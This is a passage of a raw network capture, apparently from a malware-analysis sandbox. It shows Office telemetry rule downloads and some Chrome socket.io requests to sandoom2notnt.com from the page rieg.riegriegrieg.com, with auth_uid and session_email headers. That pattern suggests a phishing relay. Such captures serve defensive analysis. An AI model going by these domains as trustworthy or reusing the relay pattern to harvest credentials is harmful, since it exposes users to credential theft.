                                                                              2024-10-26 06:49:44 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              127192.168.2.44988713.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:45 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:45 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:45 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1427
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                              ETag: "0x8DC582BE56F6873"
                                                                              x-ms-request-id: 0c5aa6f6-c01e-000b-5d92-25e255000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064945Z-15b8d89586fst84k5f3z220tec0000000hd00000000024e7
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:45 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              128192.168.2.44988613.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:45 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:45 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:45 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1360
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                              ETag: "0x8DC582BDD74D2EC"
                                                                              x-ms-request-id: 95bc9e17-201e-0051-77f2-247340000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064945Z-15b8d89586fvpb597drk06r8fc00000002n0000000009w75
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              X-Cache-Info: L1_T2
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:45 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              129192.168.2.449883188.114.97.34435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:45 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PB7beRs&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1
                                                                              Host: sandoom2notnt.com
                                                                              Connection: keep-alive
                                                                              Accept: */*
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: auth_uid,session_email
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:49:45 UTC915INHTTP/1.1 204 No Content
                                                                              Date: Sat, 26 Oct 2024 06:49:45 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                              Vary: Access-Control-Request-Headers
                                                                              Access-Control-Allow-Headers: auth_uid,session_email
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wZmzyJmc6nVuchytb5AtxjAi6HPZT6l3N1dYlhpxGQ%2FanN7%2B8HbcWYfprwNhnikksUXn03ZDC%2Bu4ObXdUymIYQ8YfyIHgY2TEKObMCWdJg4uljMEqc8kue2bYD5Q7%2FQumFCbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d88821c58396371-LHR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=103692&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1171&delivery_rate=27928&cwnd=32&unsent_bytes=0&cid=4cf1b335c598152f&ts=465&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              130192.168.2.449884188.114.97.34435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:45 UTC563OUTGET /socket.io/?EIO=4&transport=websocket&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1
                                                                              Host: sandoom2notnt.com
                                                                              Connection: Upgrade
                                                                              Pragma: no-cache
                                                                              Cache-Control: no-cache
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Upgrade: websocket
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              Sec-WebSocket-Version: 13
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Sec-WebSocket-Key: 0b57MZGac31qPTryDxyZmw==
                                                                              Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                              2024-10-26 06:49:46 UTC805INHTTP/1.1 400 Bad Request
                                                                              Date: Sat, 26 Oct 2024 06:49:45 GMT
                                                                              Content-Type: application/json
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FIRRDhLKWJn0f4%2BF9MPYAUDB%2BLpkEbpNuVS%2F2JaBK4prCzFoSbf4GktC2EXL9jUzr746dfbs4O6XiW32nyvBhQoluXmo8UcuS5YFcUEmreLeI%2BP%2BWSMiunWGN5txCV8nddvD2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d88821c9ea56fe8-CDG
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=116673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1124&delivery_rate=24818&cwnd=32&unsent_bytes=0&cid=4affa470aa8c5fcd&ts=481&x=0"
                                                                              2024-10-26 06:49:46 UTC40INData Raw: 32 32 0d 0a 7b 22 63 6f 64 65 22 3a 33 2c 22 6d 65 73 73 61 67 65 22 3a 22 42 61 64 20 72 65 71 75 65 73 74 22 7d 0d 0a
                                                                              Data Ascii: 22{"code":3,"message":"Bad request"}
                                                                              2024-10-26 06:49:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              131192.168.2.449885188.114.97.34435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:45 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PB7beRv&sid=JMhweoIWN1gqZtHIAAXf HTTP/1.1
                                                                              Host: sandoom2notnt.com
                                                                              Connection: keep-alive
                                                                              Accept: */*
                                                                              Access-Control-Request-Method: GET
                                                                              Access-Control-Request-Headers: auth_uid,session_email
                                                                              Origin: https://rieg.riegriegrieg.com
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://rieg.riegriegrieg.com/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-26 06:49:46 UTC915INHTTP/1.1 204 No Content
                                                                              Date: Sat, 26 Oct 2024 06:49:45 GMT
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                                              Vary: Access-Control-Request-Headers
                                                                              Access-Control-Allow-Headers: auth_uid,session_email
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CV%2F7kpESI6aNC3hBxrtToAqyrPRHRuijKSqnBBYDtld3XesrFvo3bAp9vY0%2FVH2cYYjjiKm%2BLX1uG4vaKzXji78ffIH3Nqw3t1ChHYJ2XVFXMs5qqrO%2FlxprVzeh5y0AM3Wmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8d88821cac22d11c-CDG
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=116545&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1170&delivery_rate=24839&cwnd=32&unsent_bytes=0&cid=ac9babd660597d26&ts=479&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              132192.168.2.44988913.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:45 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:45 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:45 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1401
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                              ETag: "0x8DC582BE2A9D541"
                                                                              x-ms-request-id: ff6a02c5-601e-003e-572b-263248000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064945Z-17c5cb586f6hhlf5mrwgq3erx800000002qg000000008083
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:45 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              133192.168.2.44988813.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:45 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:45 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:45 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1390
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                              ETag: "0x8DC582BE3002601"
                                                                              x-ms-request-id: 9a0db76d-d01e-0017-4396-25b035000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064945Z-16849878b78fmrkt2ukpvh9wh40000000a7000000000g844
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:45 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              134192.168.2.44989113.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:45 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:45 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:45 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1364
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                              ETag: "0x8DC582BEB6AD293"
                                                                              x-ms-request-id: 2f6e7a45-901e-0083-466a-26bb55000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064945Z-16849878b78z5q7jpbgf6e9mcw0000000ahg0000000015ht
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:45 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              135192.168.2.44989313.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:46 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:46 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:46 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1354
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                              ETag: "0x8DC582BE0662D7C"
                                                                              x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064946Z-16849878b78z5q7jpbgf6e9mcw0000000ac000000000f4bd
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:46 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              136192.168.2.44989213.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:46 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:46 UTC563INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:46 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1391
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Cache-Control: public, max-age=604800, immutable
                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                              ETag: "0x8DC582BDF58DC7E"
                                                                              x-ms-request-id: b2ef1849-d01e-00ad-023d-26e942000000
                                                                              x-ms-version: 2018-03-28
                                                                              x-azure-ref: 20241026T064946Z-17c5cb586f6mkpfk79wxvcahc0000000024g000000002zdu
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_HIT
                                                                              Accept-Ranges: bytes
                                                                              2024-10-26 06:49:46 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                              137192.168.2.44989513.107.246.45443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-26 06:49:46 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept-Encoding: gzip
                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                              Host: otelrules.azureedge.net
                                                                              2024-10-26 06:49:46 UTC584INHTTP/1.1 200 OK
                                                                              Date: Sat, 26 Oct 2024 06:49:46 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 1366
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
                                                                              Vary: Accept-Encoding
